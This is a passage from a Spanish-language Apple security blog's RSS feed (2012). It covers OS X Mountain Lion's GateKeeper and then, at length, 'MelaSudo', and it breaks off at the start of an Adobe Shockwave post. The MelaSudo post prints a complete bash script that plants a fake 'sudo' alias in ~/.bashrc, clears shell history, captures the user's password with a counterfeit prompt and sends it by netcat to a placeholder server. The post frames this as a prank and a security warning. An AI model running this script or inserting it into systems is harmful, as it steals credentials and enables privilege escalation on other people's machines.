&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vSV58xoPQPU:l-PGlR6PXJs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vSV58xoPQPU:l-PGlR6PXJs:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vSV58xoPQPU:l-PGlR6PXJs:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vSV58xoPQPU:l-PGlR6PXJs:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vSV58xoPQPU:l-PGlR6PXJs:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=vSV58xoPQPU:l-PGlR6PXJs:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vSV58xoPQPU:l-PGlR6PXJs:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=vSV58xoPQPU:l-PGlR6PXJs:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/vSV58xoPQPU/steve-jobs-esta-haciendo-cambios-en-el.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-QWRnc-PHcq0/Tz1oSUfkCeI/AAAAAAAADCQ/EYmz1N6kifQ/s72-c/Curia_iPad.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/steve-jobs-esta-haciendo-cambios-en-el.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-5364487232284588955</guid><pubDate>Fri, 17 Feb 2012 05:53:00 +0000</pubDate><atom:updated>2012-02-17T06:53:18.558+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Mountain Lion</category><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><category domain="http://www.blogger.com/atom/ns#">iOS</category><category domain="http://www.blogger.com/atom/ns#">Mac OS X</category><category domain="http://www.blogger.com/atom/ns#">Ma OS X</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Informática</category><title>OS X 10.8 Mountain Lion viene con un "GateKeeper"</title><description>&lt;div style="text-align: justify;"&gt;Ayer Internet se revolucionó con la &lt;a href="http://www.apple.com/pr/library/2012/02/16Apple-Releases-OS-X-Mountain-Lion-Developer-Preview-with-Over-100-New-Features.html"&gt;nota de prensa&lt;/a&gt;, y el nuevo anunció de &lt;i&gt;&lt;b&gt;OS X 10.8 Mountain Lion&lt;/b&gt;&lt;/i&gt;, el nuevo sistema operativo de Apple que se va lanzar en un tiempo record, dejando que el &lt;i&gt;&lt;b&gt;"Rey de la Selva"&lt;/b&gt;&lt;/i&gt; tenga un reinado más bien corto. En esta nueva revisión de la versión X de Mac OS - &lt;i&gt;a la que han quitado "Mac" del nombre&lt;/i&gt; - , la unión entre el interfaz gráfico de iOS y los sistemas Mac OS X es ya casi un hecho, después de que &lt;a href="http://www.appleinsider.com/articles/12/02/07/apple_intern_thesis_leaks_secret_project_to_port_mac_os_x_to_arm_processors.html"&gt;apareciera en un paper académico el trabajo de Apple en microprocesadores ARM&lt;/a&gt; y la &lt;a href="http://www.appleinsider.com/articles/12/02/16/tim_cook_admits_apple_may_further_converge_ios_os_x_macs_could_run_on_arm_cpus.html"&gt;confirmación definitiva por parte de Tim Cook de esta línea&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Tl7axsvucAc/Tz1k9ogIgwI/AAAAAAAADCI/-uLcX8Sl0Hc/s1600/Mac+OS+X+Mountain+Lion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-Tl7axsvucAc/Tz1k9ogIgwI/AAAAAAAADCI/-uLcX8Sl0Hc/s1600/Mac+OS+X+Mountain+Lion.png" width="540" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Con la unión de ambos entornos - aunque de momento no es total y solo es una convergencia &lt;i&gt;on-going&lt;/i&gt;&amp;nbsp;-, si se suman el volumen de aplicaciones que se han acumulado ya en la &lt;i&gt;&lt;b&gt;App Store&lt;/b&gt;&lt;/i&gt; y la &lt;i&gt;&lt;b&gt;Mac App Store&lt;/b&gt;&lt;/i&gt; el resultado es enorme. Es por ello que, teniendo en cuenta que no todas las aplicaciones están hechas por &lt;i&gt;"chicos buenos"&lt;/i&gt;, Apple no quiere que haya muchos problemas de seguridad o privacidad, como el ya famoso caso del &lt;a href="http://www.seguridadapple.com/2012/02/path-enviaba-los-contactos-sin.html"&gt;escándalo Path&lt;/a&gt;, en el que un &lt;a href="http://thenextweb.com/apple/2012/02/15/congress-sends-letter-to-apple-questioning-the-path-debacle-developer-data-access/"&gt;congresista ha pedido explicaciones a Apple por carta&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Es por ello que en &lt;i&gt;&lt;b&gt;OS X 10.8 Mountain Lion&lt;/b&gt;&lt;/i&gt; ya ha opciones para mejorar la seguridad con respecto a las aplicaciones, y se ha añadido a &lt;i&gt;&lt;b&gt;GateKeeper&lt;/b&gt;&lt;/i&gt;&amp;nbsp;- &lt;i&gt;no confundir con el antivirus de hace muchos años&lt;/i&gt; -. Este software permitirá poder controlar desde las preferencias del sistema que sólo se puedan instalar aplicaciones que hayan sido descargadas desde las tiendas de Apple, o que se vengan asociadas con un ID de un desarrollador de Apple, el cuál tendrá que cuidar su reputación. El funcionamiento es un poco rudimentario según &lt;a href="http://nakedsecurity.sophos.com/2012/02/17/apples-gatekeeper-security-feature-leaves-a-lot-to-be-desired/"&gt;alertan desde Naked Security&lt;/a&gt;, ya que se sigue basando en una tecnología similar a &lt;a href="http://www.seguridadapple.com/2011/06/xprotect-no-es-un-antimalware.html"&gt;XProtect&lt;/a&gt;, es decir, con listas blancas pero siempre es mejor que nada.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Esto permitiría al usuario evitar que cualquier otro programa intentase ejecutarse en el sistema &lt;i&gt;&lt;b&gt;OS X Mountain Lion&lt;/b&gt;&lt;/i&gt;. Sin embargo, aunque es una configuración por defecto, como se puede ver en la &lt;i&gt;Figura 1&lt;/i&gt;, esta opción es elegible por el usuario.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-y7on-pqnkO0/Tz1gtGRoWDI/AAAAAAAADCA/yOjTf1-l5JY/s1600/gatekeeper-120216.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-y7on-pqnkO0/Tz1gtGRoWDI/AAAAAAAADCA/yOjTf1-l5JY/s1600/gatekeeper-120216.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Configuración de aplicaciones que dejará ejecutar GateKeeper&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Por otro lado, &lt;i&gt;&lt;b&gt;GateKeeper&lt;/b&gt;&lt;/i&gt; también controla la ejecución de las aplicaciones y de los permisos de que estas hacen uso, tales como acceder a los contactos personales, enviar información de geo-posicionamiento, o datos del usuario, que Apple no se olvida del &lt;a href="http://www.seguridadapple.com/2011/04/apple-te-espia-pero-ya-lo-sabias-o.html"&gt;escándalo de iPhoneTracker&lt;/a&gt;, ni del que hubo con &lt;a href="http://www.seguridadapple.com/2011/12/el-rootkit-de-carrier-iq-en-iphone-y.html"&gt;Carrier iQ&lt;/a&gt;, y por supuesto el más reciente con &lt;a href="http://www.seguridadapple.com/2012/02/path-enviaba-los-contactos-sin.html"&gt;Path&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;De todas formas, esto solo es una versión para desarrolladores, que coincide con la más que posible llegada de &lt;i&gt;&lt;b&gt;Windows 8&lt;/b&gt;&lt;/i&gt; y, aunque desde Apple lo niegan, parece que la competición por el &lt;a href="http://www.elladodelmal.com/2012/01/windows-8-el-interfaz-metro-y-la-start.html"&gt;mercado de equipos híbridos&lt;/a&gt; está más cerca que nunca de comenzar.&lt;br /&gt;
&lt;br /&gt;
Tú, por si quieres ir conociendo mejor este sistema, puedes &lt;a href="https://developer.apple.com/technologies/mountain-lion/"&gt;descargar la versión beta de OS X 10.8 Mountain Lion&lt;/a&gt; desde la web de desarrolladores.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-5364487232284588955?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=ewgIEXvPklQ:wusdQdOAsOs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=ewgIEXvPklQ:wusdQdOAsOs:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=ewgIEXvPklQ:wusdQdOAsOs:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=ewgIEXvPklQ:wusdQdOAsOs:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=ewgIEXvPklQ:wusdQdOAsOs:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=ewgIEXvPklQ:wusdQdOAsOs:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=ewgIEXvPklQ:wusdQdOAsOs:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=ewgIEXvPklQ:wusdQdOAsOs:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/ewgIEXvPklQ/os-x-108-mountain-lion-viene-con-un.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Tl7axsvucAc/Tz1k9ogIgwI/AAAAAAAADCI/-uLcX8Sl0Hc/s72-c/Mac+OS+X+Mountain+Lion.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/os-x-108-mountain-lion-viene-con-un.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-4607340442297744439</guid><pubDate>Thu, 16 Feb 2012 06:56:00 +0000</pubDate><atom:updated>2012-02-16T09:41:03.597+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">exploits</category><category domain="http://www.blogger.com/atom/ns#">cracking</category><category domain="http://www.blogger.com/atom/ns#">ingeniería social</category><category domain="http://www.blogger.com/atom/ns#">hasselhoff</category><category domain="http://www.blogger.com/atom/ns#">Mac OS X</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>MelaSudo: robar la password a un sudoer con ingenio</title><description>&lt;div style="text-align: justify;"&gt;
&lt;i&gt;&lt;b&gt;MelaSudo&lt;/b&gt;&lt;/i&gt; es un pequeño script en bash desarrollado como &lt;i&gt;'arma de guerrilla'&lt;/i&gt; y utilizado internamente dentro del equipo de &lt;a href="http://www.informatica64.com/AplicacionesWeb.aspx"&gt;auditoría web&lt;/a&gt; del &lt;i&gt;&lt;b&gt;SOCtano&lt;/b&gt;&lt;/i&gt; de &lt;a href="http://www.informatica64.com/"&gt;informatica64&lt;/a&gt;, como forma de venganza contra aquellos linuxeros/maqueros que rinden culto al &lt;a href="http://www.seguridadapple.com/2010/10/protege-tu-equipo-que-no-te-mire-david.html"&gt;ataque David Hasselhoff&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La finalidad de este &lt;i&gt;script&lt;/i&gt; consiste en devolver un &lt;span id="goog_1703194104"&gt;&lt;/span&gt;ataque &lt;i&gt;&lt;b&gt;David Hasselhoff&lt;/b&gt;&lt;/i&gt;&lt;span id="goog_1703194105"&gt;&lt;/span&gt; realizando el robo del password de un usuario con permisos de &lt;i&gt;&lt;b&gt;'sudoer'&lt;/b&gt;&lt;/i&gt; mediante el uso de un alias falso del comando &lt;i&gt;&lt;b&gt;'sudo&lt;/b&gt;&lt;/i&gt;'. Para ello, lógicamente hay que tener acceso local a la sesión de un usuario con permisos de &lt;i&gt;&lt;b&gt;sudoer&lt;/b&gt;&lt;/i&gt;, pero en lugar de devolverle el ataque &lt;i&gt;&lt;b&gt;David Hasselhoff&lt;/b&gt;&lt;/i&gt;, le robareos la password.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como normalmente hay poco tiempo cuando alguien se deja la sesión abierta, se ha hecho un &lt;i&gt;script&lt;/i&gt; que automatiza todo el proceso. La instalación de la trama es muy sencilla, basta con ejecutar el &lt;i&gt;script&lt;/i&gt; con el parámetro &lt;i&gt;'instalar'&lt;/i&gt; tal y como se ve en la siguiente captura de pantalla.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-AeyD-xnz1bw/TzylA3bSleI/AAAAAAAADBY/urhrUjqoVgc/s1600/melasudo1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-AeyD-xnz1bw/TzylA3bSleI/AAAAAAAADBY/urhrUjqoVgc/s1600/melasudo1.jpg" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Instalación de MelaSudo&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El proceso de instalación consiste en la copia del script en&lt;i&gt;&lt;b&gt; '~/.thumbmails'&lt;/b&gt;&lt;/i&gt; y en añadir la linea &lt;i&gt;&lt;b&gt;'alias sudo="bash ~/.thumbmails"&lt;/b&gt;&lt;/i&gt;' al fichero &lt;i&gt;&lt;b&gt;'~/.bashrc'&lt;/b&gt;&lt;/i&gt;. Éste ultimo fichero es ejecutado cada vez que se inicia una terminal &lt;i&gt;&lt;b&gt;bash&lt;/b&gt;&lt;/i&gt;, por lo que nos aseguraríamos de que en cada una de ellas se ejecutase el alias encargado de realizar el robo de la password.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A continuación se ve como al ejecutar desde una terminal &lt;i&gt;&lt;b&gt;bash&lt;/b&gt;&lt;/i&gt; el comando &lt;i&gt;&lt;b&gt;whoami&lt;/b&gt;&lt;/i&gt;, muestra que se trata del usuario '&lt;i&gt;&lt;b&gt;haha&lt;/b&gt;&lt;/i&gt;', y tras realizar una elevación mediante &lt;i&gt;&lt;b&gt;'sudo&lt;/b&gt;&lt;/i&gt;', se solicita la la password en dos ocasiones, simulando que en el primer intento se ha introducido incorrectamente, pero tratandose en realidad del script &lt;i&gt;&lt;b&gt;'Melasudo'&lt;/b&gt;&lt;/i&gt;. En la segunda petición de password ya se trata realmente del comando&amp;nbsp;sudo, y autentica correctamente al usuario como &lt;i&gt;&lt;b&gt;'root'&lt;/b&gt;&lt;/i&gt;. &lt;/div&gt;
&lt;div style="margin-bottom: 0cm;"&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-97B4owTXEpI/TzylBxbyKoI/AAAAAAAADBg/zFE0asVKwDQ/s1600/melasudo2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-97B4owTXEpI/TzylBxbyKoI/AAAAAAAADBg/zFE0asVKwDQ/s1600/melasudo2.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: Ejecución de MelaSudo&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div style="margin-bottom: 0cm;"&gt;
&lt;/div&gt;
&lt;div style="margin-bottom: 0cm;"&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="margin-bottom: 0cm;"&gt;
&lt;div style="text-align: justify;"&gt;
Como este &lt;i&gt;script&lt;/i&gt; fue diseñado para gastar bromas a compañeros que se dejan el equipo desbloqueado, cosa que no suele ser habitual, fue necesario diseñar un sistema que nos permitiera ver su password sin necesidad a tener que esperar a que se volviera a dejar el equipo sin bloquear. Por ello, se envía a través la red a un servidor web haciendo uso de &lt;i&gt;&lt;b&gt;netcat&lt;/b&gt;&lt;/i&gt; (asegúrate de que lo tiene, si no adapta el &lt;u&gt;script&lt;/u&gt;), para que sea mucho más cómodo todo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-4gs64ueuVD0/TzylDAXICQI/AAAAAAAADBo/pvKVx_dNe_M/s1600/melasudo3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-4gs64ueuVD0/TzylDAXICQI/AAAAAAAADBo/pvKVx_dNe_M/s1600/melasudo3.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 3: Log generado por MelaSudo en el servidor web&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div style="margin-bottom: 0cm;"&gt;
&lt;/div&gt;
&lt;div style="margin-bottom: 0cm;"&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="margin-bottom: 0cm;"&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial;"&gt;El código del script &lt;i&gt;&lt;b&gt;MelaSudo&lt;/b&gt;&lt;/i&gt; puedes obtenerlo desde aquí:&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;i&gt;#!/bin/bash&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;if [ "x$1" == "xinstalar" ]; then&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;cp $0 ~/.thumbmails 2&amp;gt; /dev/null&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;echo 'alias sudo="bash ~/.thumbmails"' &amp;gt;&amp;gt; ~/.bashrc&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;echo "instalado"&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;history -c&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;exit&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;fi&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;#mac&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;echo -n "Password:"&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;#ubuntu&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;#echo -n "[sudo] password for `whoami`: "&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;read -s password&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;echo&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;rutaReal=$(whereis sudo | awk '{print $2}')&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;if [ "x$rutaReal" == "x" ]; then&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;rutaReal=$(whereis sudo | awk '{print $1}')&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;if [ "x$rutaReal" == "x" ]; then&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;rutaReal=$(whereis sudo | awk '{print $0}')&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;fi&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;fi&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;echo -en "GET /password.php?password=$password HTTP/1.1\nConnection: close\nhost: tuserver.com\n\n" | nc tuserver.com 80 &amp;gt;/dev/null 2&amp;gt;/dev/null&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;echo -e "Sorry, try again."&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;$rutaReal $1 $2 $3 $4 $5 $6 $7&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin-bottom: 0cm;"&gt;
&lt;div style="text-align: justify;"&gt;
Como se puede ver, para cada sistema operativo hay que personalizar el mensaje de error para que sea más creíble el truco. Esperamos que esto os ayude a tener mucho más cuidado de vuestras sesiones, ya que el ataque &lt;i&gt;&lt;b&gt;David Hasselhoff&lt;/b&gt;&lt;/i&gt; es lo que menos te puede ocurrir.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por supuesto, esta idea puede ser utilizada en cualquier entorno de post-explotación de una sesión de un usuario &lt;i&gt;&lt;b&gt;sudoer &lt;/b&gt;&lt;/i&gt;con un ataque client-side, como &lt;a href="http://www.seguridadapple.com/2011/10/por-que-actualizar-apple-safari-la.html"&gt;a través de un Safari&lt;/a&gt; o &lt;a href="http://www.seguridadapple.com/2011/12/tomando-el-control-de-mac-os-x-traves.html"&gt;un Java sin parchear&lt;/a&gt;.&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-4607340442297744439?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=Du-LAxAdbso:e7antz-fgYY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=Du-LAxAdbso:e7antz-fgYY:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=Du-LAxAdbso:e7antz-fgYY:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=Du-LAxAdbso:e7antz-fgYY:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=Du-LAxAdbso:e7antz-fgYY:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=Du-LAxAdbso:e7antz-fgYY:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=Du-LAxAdbso:e7antz-fgYY:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=Du-LAxAdbso:e7antz-fgYY:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/Du-LAxAdbso/melasudo-robar-la-password-un-sudoer.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-AeyD-xnz1bw/TzylA3bSleI/AAAAAAAADBY/urhrUjqoVgc/s72-c/melasudo1.jpg" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/melasudo-robar-la-password-un-sudoer.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-4837824418390829861</guid><pubDate>Wed, 15 Feb 2012 13:50:00 +0000</pubDate><atom:updated>2012-02-15T14:50:21.130+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Adobe</category><category domain="http://www.blogger.com/atom/ns#">Flash</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidades</category><category domain="http://www.blogger.com/atom/ns#">Actualizaciones</category><title>Actualización crítica de Adobe ShockWave para Mac OS X</title><description>&lt;div style="text-align: justify;"&gt;&lt;a href="http://4.bp.blogspot.com/-EzMBgwUQ4-4/Tzu3yTrdAWI/AAAAAAAADBQ/zSIvzHBTOb8/s1600/Adobe-Shockwave.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="138" src="http://4.bp.blogspot.com/-EzMBgwUQ4-4/Tzu3yTrdAWI/AAAAAAAADBQ/zSIvzHBTOb8/s200/Adobe-Shockwave.jpg" width="200" 